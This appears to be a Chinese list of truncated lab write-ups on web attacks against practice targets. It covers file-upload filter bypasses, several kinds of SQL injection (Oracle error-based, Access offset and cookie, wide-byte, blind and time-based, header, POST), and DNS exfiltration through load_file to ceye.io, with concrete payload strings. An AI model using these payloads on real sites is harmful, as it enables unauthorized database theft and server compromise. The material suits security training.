P90 上传漏洞(全)
1、普通的前端检测,直接上传抓包然后把后缀名改掉就可以2、只检测Content-Type类型,直接上传PHP文件然后抓包修改Content-Type的类型即可3、默认状态下,php3,php4等都会被默认解析为php文件,我们只需要将后缀名更改一下,然后上传,web容器就会自动解析为PHP文件并且可以执行4、包含AddType application/x-httpd-php .jpg 内容的.ht
P90 Oracle注入报错注入
添加‘之后发现页面报错,从报错信息中我们可以看出这是个Oracle数据库http://o1.lab.aqlab.cn:81/?id=1%27%20and%201=ctxsys.drithsx.sn(1,(select%20banner%20from%20sys.v_$version%20where%20rownum=1))--+爆出数据库信息版本11.2.0.2.0 数据库名 DRG-1
P90 mysql注入dns注入+mssql注入反弹注入
Dns注入利用load_fike()函数既可以读取本地文件也可以用来发送dns请求,这样我们就可以通过这个函数来实现敏感信息的的查询。前提是读取返回的内容为长度小于max_allowed_packet值(一般为1MB)的字符串,而且文件必须为当前服务器的绝对路径且拥有FILE权限可读。利用ceye.io上的pyload就可以将敏感信息拼接到ceye.io的记录中显示出来。比如pyload:?id=
P90 orical注入报错注入
添加‘之后发现页面报错,从报错信息中我们可以看出这是个Oracle数据库http://o1.lab.aqlab.cn:81/?id=1%27%20and%201=ctxsys.drithsx.sn(1,(select%20banner%20from%20sys.v_$version%20where%20rownum=1))--+爆出数据库信息版本11.2.0.2.0 数据库名 DRG-1
P90 access注入偏移注入
偏移注入偏移注入的要求是当前正常要执行的语句所包含的字段数大于要查询的其他表的字段数。实际上就是利用联合查询的显错点,通过平移要查询表所有字段的位置来将其某些字段敏感信息显示出来,因为要查找整张表的所有字段,所以正常查询的所在表字段要足够的多。靶场做法:1、首先靶场也是要利用cookie进行传参,我们首先用order by来找一下当前表的字段数。从1开始ID=103+order+by+1 一直到2
P90 access注入cookie注入
1、直接在url进行注入的话会提示非法字符2、尝试利用cookie进行传参,id=171+and+1正常说明可以利用cookie进行传参3、order by排序从1开始一直到11发生了报错,说明只有十个字段4、union select联合查询寻找显错点id=171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin5、找位置来显示字段id=171+union+
P90 宽字节注入
函数的存在使得‘被转义为了\’因此如果想实现注入必须让‘逃逸,这里我们可以使用用汉字運使得’逃逸形成運‘。6.3.1-SQL注入-宽字节注入Rank 1利用%df%27使得‘逃逸,其他的步骤与显错注入一致
P90 盲注+延时注入
盲注盲注就是在服务器关闭了错误回显的情况下,通过服务器是否响应或者用服务器是否发生我们自定义的延时来爆破表名字段名字段内容等敏感信息的长度、内容,从而进行sql注入攻击。我们可以通过length()、substr()、ascii()等函数将数据库中的数据与我们的猜测进行比较,然后利用返回结果为0或1来and原来的正常数据来达到正常显示和无法正常显示的回显效果,从而对我们猜测的正确性进行判断。我们也
P90 head注入
Head注入http头攻击漏洞的产生就是因为服务器使用了不受信任的http头字段对某个业务进行的操作。而http头都是我们可以恶意篡改的。所以我们首先是要找出这个可以被篡改并且可以对数据库进行操作的http头。6.5.1-SQL注入-Header注入Rank 11、寻找注入点,我们在登陆界面输入账号密码发现他返回了user-agent的内容,所以我们怀疑通过user-agent的内容我们可以对数据
P90 POST注入
POST注入 POST注入的注入点一般在登陆框、搜索框等文本框内 第一步判断是否存在注入点在文本框内输入内容后加‘页面报错存在注入第二步判断一下有几个字段文本框输入1’order by 1# 然后利用二分法改变字段数量进行判断当输入1' order by 2#时正常当输入1' order by 3#时报错存在两个字段第三步我们找到一个空白页利用union sel